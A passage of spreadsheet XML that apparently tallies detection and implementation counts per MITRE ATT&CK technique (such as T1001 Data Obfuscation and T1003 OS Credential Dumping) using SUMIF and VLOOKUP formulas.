      <c r="Q2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="R2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="S2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="T2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="U2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="V2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="W2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="X2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="Y2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="Z2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AA2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AB2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AC2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AD2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AE2" s="288" t="s">
        <v>293</v>
      </c>
      <c r="AF2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AG2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AH2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AI2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AJ2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AK2" s="291" t="s">
        <v>293</v>
      </c>
      <c r="AL2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AM2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AN2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AO2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AP2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AQ2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="AR2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AS2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AT2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AU2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AV2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AW2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="AX2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AY2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AZ2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="BA2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="BB2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="BC2" s="511" t="s">
        <v>293</v>
      </c>
      <c r="BD2" s="512" t="s">
        <v>4457</v>
      </c>
      <c r="BE2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BF2" s="584" t="s">
        <v>725</v>
      </c>
      <c r="BG2" s="493" t="s">
        <v>2487</v>
      </c>
      <c r="BH2" s="513" t="s">
        <v>4131</v>
      </c>
      <c r="BI2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BJ2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BK2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BL2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BM2" s="325" t="s">
        <v>2488</v>
      </c>
      <c r="BN2" s="336" t="s">
        <v>4132</v>
      </c>
      <c r="BO2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BP2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BQ2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BR2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BS2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="BT2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="BU2" s="397" t="s">
        <v>4131</v>
      </c>
      <c r="BV2" s="338" t="s">
        <v>293</v>
      </c>
      <c r="BW2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BX2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BY2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="BZ2" s="324" t="s">
        <v>2489</v>
      </c>
      <c r="CA2" s="336" t="s">
        <v>4133</v>
      </c>
      <c r="CB2" s="404" t="s">
        <v>293</v>
      </c>
      <c r="CC2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="CD2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="CE2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="CF2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="CG2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="CH2" s="397" t="s">
        <v>4131</v>
      </c>
    </row>
    <row r="3" spans="1:93" s="8" customFormat="1" ht="15" customHeight="1">
      <c r="A3" s="4">
        <v>1</v>
      </c>
      <c r="B3" s="4" t="str">
        <f>IFERROR(VLOOKUP(A3,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1001</v>
      </c>
      <c r="C3" s="493" t="str">
        <f>IFERROR(VLOOKUP(B3,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="D3" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B3)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F3" s="286" t="str">
        <f>D3&amp;" ("&amp;E3&amp;")"</f>
        <v>2 (2)</v>
      </c>
      <c r="G3" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>9</v>
      </c>
      <c r="H3" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>6</v>
      </c>
      <c r="I3" s="322" t="str">
        <f>H3 &amp; " (" &amp; G3 &amp; ")"</f>
        <v>6 (9)</v>
      </c>
      <c r="J3" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>6</v>
      </c>
      <c r="K3" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M3" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N3" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O3" s="322" t="str">
        <f>N3 &amp; " (" &amp; M3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="P3" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q3" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S3" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>9</v>
      </c>
      <c r="T3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U3" s="4" t="str">
        <f>T3 &amp; " (" &amp; S3 &amp; ")"</f>
        <v>6 (9)</v>
      </c>
      <c r="V3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W3" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>9</v>
      </c>
      <c r="Z3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>6</v>
      </c>
      <c r="AA3" s="322" t="str">
        <f>Z3 &amp; " (" &amp; Y3 &amp; ")"</f>
        <v>6 (9)</v>
      </c>
      <c r="AB3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC3" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>8</v>
      </c>
      <c r="AF3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>4</v>
      </c>
      <c r="AG3" s="322" t="str">
        <f>AF3 &amp; " (" &amp; AE3 &amp; ")"</f>
        <v>4 (8)</v>
      </c>
      <c r="AH3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>4</v>
      </c>
      <c r="AI3" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>17</v>
      </c>
      <c r="AL3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>10</v>
      </c>
      <c r="AM3" s="322" t="str">
        <f>AL3 &amp; " (" &amp; AK3 &amp; ")"</f>
        <v>10 (17)</v>
      </c>
      <c r="AN3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>10</v>
      </c>
      <c r="AO3" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ3" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR3" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS3" s="322" t="str">
        <f>AR3 &amp; " (" &amp; AQ3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT3" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU3" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY3" s="322" t="str">
        <f>AX3 &amp; " (" &amp; AW3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AZ3" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA3" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC3" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>9</v>
      </c>
      <c r="BD3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>6</v>
      </c>
      <c r="BE3" s="4" t="str">
        <f>BD3 &amp; " (" &amp; BC3 &amp; ")"</f>
        <v>6 (9)</v>
      </c>
      <c r="BF3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG3" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI3" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>1</v>
      </c>
      <c r="BJ3" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK3" s="322" t="str">
        <f>BJ3 &amp; " (" &amp; BI3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="BL3" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM3" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.5</v>
      </c>
      <c r="BN3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO3" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>3</v>
      </c>
      <c r="BP3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>3</v>
      </c>
      <c r="BQ3" s="4" t="str">
        <f>BP3 &amp; " (" &amp; BO3 &amp; ")"</f>
        <v>3 (3)</v>
      </c>
      <c r="BR3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT3" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU3" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>2</v>
      </c>
      <c r="BV3" s="292">
        <v>3</v>
      </c>
      <c r="BW3" s="322">
        <v>3</v>
      </c>
      <c r="BX3" s="4" t="str">
        <f>BW3 &amp; " (" &amp; BV3 &amp; ")"</f>
        <v>3 (3)</v>
      </c>
      <c r="BY3" s="12">
        <v>3</v>
      </c>
      <c r="BZ3" s="13">
        <v>1</v>
      </c>
      <c r="CA3" s="394">
        <v>2</v>
      </c>
      <c r="CB3" s="288">
        <v>6</v>
      </c>
      <c r="CC3" s="4">
        <v>5</v>
      </c>
      <c r="CD3" s="4" t="str">
        <f>CC3 &amp; " (" &amp; CB3 &amp; ")"</f>
        <v>5 (6)</v>
      </c>
      <c r="CE3" s="4">
        <v>3</v>
      </c>
      <c r="CF3" s="4">
        <v>2</v>
      </c>
      <c r="CG3" s="13">
        <v>1</v>
      </c>
      <c r="CH3" s="394">
        <v>2</v>
      </c>
      <c r="CM3" s="9"/>
      <c r="CN3" s="9"/>
      <c r="CO3" s="9"/>
    </row>
    <row r="4" spans="1:93" ht="15" customHeight="1">
      <c r="A4" s="4">
        <f>A3+1</f>
        <v>2</v>
      </c>
      <c r="B4" s="4" t="str">
        <f>IFERROR(VLOOKUP(A4,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1003</v>
      </c>
      <c r="C4" s="493" t="str">
        <f>IFERROR(VLOOKUP(B4,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="D4" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B4)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E4" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F4" s="579" t="str">
        <f>D4&amp;" ("&amp;E4&amp;")"</f>
        <v>1 (3)</v>
      </c>
      <c r="G4" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>3</v>
      </c>
      <c r="H4" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I4" s="322" t="str">
        <f t="shared" ref="I4:I67" si="0">H4 &amp; " (" &amp; G4 &amp; ")"</f>
        <v>2 (3)</v>
      </c>
      <c r="J4" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K4" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M4" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N4" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O4" s="322" t="str">
        <f t="shared" ref="O4:O67" si="1">N4 &amp; " (" &amp; M4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="P4" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q4" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S4" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>3</v>
      </c>
      <c r="T4" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>2</v>
      </c>
      <c r="U4" s="4" t="str">
        <f t="shared" ref="U4:U67" si="2">T4 &amp; " (" &amp; S4 &amp; ")"</f>
        <v>2 (3)</v>
      </c>
      <c r="V4" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W4" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>4</v>
      </c>
      <c r="Z4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>3</v>
      </c>
      <c r="AA4" s="322" t="str">
        <f t="shared" ref="AA4:AA67" si="3">Z4 &amp; " (" &amp; Y4 &amp; ")"</f>
        <v>3 (4)</v>
      </c>
      <c r="AB4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC4" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG4" s="322" t="str">
        <f t="shared" ref="AG4:AG67" si="4">AF4 &amp; " (" &amp; AE4 &amp; ")"</f>
        <v>2 (4)</v>
      </c>
      <c r="AH4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI4" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>8</v>
      </c>
      <c r="AL4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>5</v>
      </c>
      <c r="AM4" s="322" t="str">
        <f t="shared" ref="AM4:AM67" si="5">AL4 &amp; " (" &amp; AK4 &amp; ")"</f>
        <v>5 (8)</v>
      </c>
      <c r="AN4" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>5</v>
      </c>
      <c r="AO4" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP4" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ4" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR4" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS4" s="322" t="str">
        <f t="shared" ref="AS4:AS67" si="6">AR4 &amp; " (" &amp; AQ4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT4" s="12">
